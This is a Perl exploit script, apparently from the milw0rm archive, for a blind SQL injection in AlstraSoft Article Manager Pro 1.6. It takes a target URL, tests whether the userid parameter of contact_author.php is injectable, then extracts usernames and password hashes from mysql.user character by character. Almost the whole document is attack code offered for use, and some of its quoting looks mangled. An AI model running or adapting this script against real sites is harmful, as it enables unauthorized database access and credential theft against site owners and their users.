AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit#/usr/bin/perl
#|+| Author: GoLd_M
#--//-->
# -- AlstraSoft Article Manager Pro  Blind SQL Injection Exploit --
#--//--> Exploit :
use strict;
use LWP::Simple;

print `-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-\n`;
print `-    AlstraSoft Article Manager Pro  Blind SQL Injection Exploit   -\n`;
print `                     GoLd_M Mahmood_ali Tryag.cc/cc                 \n`;
print `+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n`;

print `\nEnter URL (ie: http://server.com): `;
	chomp(my $url=<STDIN>);
	
if(inject_test($url)) {
	print `Injecting.. Please Wait this could take several minutes..\n\n`;
	my $details = blind($url);
	print `Exploit Success! Admin Details: `.$details;
	exit;
}

sub blind {

	my $url    = shift;
	my $res    = undef;
	my $chr    = 48;
	my $substr = 1;
	my $done   = 1;
	
	while($done) {
		my $content = get($url.`/contact_author.php?userid=1)  and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM 
mysql.user),`.$substr.`,1))=`.$chr.`/*`);
		
		if($content =~ /Previous/ &amp;&amp; $chr == 94) { $done = 0; }
			elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }
				else { $chr++; }
	}
	return $res;
}

sub inject_test {

	my $url     = shift;
	my $true    = get($url.`/contact_author.php?userid=1) and 1=1 /*`);
	my $false   = get($url.`/contact_author.php?userid=1) and 1=2 /*`);
	
	if($true =~ /Previous/ &amp;&amp; $false !~ /Previous/) {
		print `\nTarget Site Vulnerable!\n\n`;
		return 1;
	} else { print `\nTarget Site Not Vulnerable! Exiting..\n`; exit; }
}

# milw0rm.com [2008-07-17]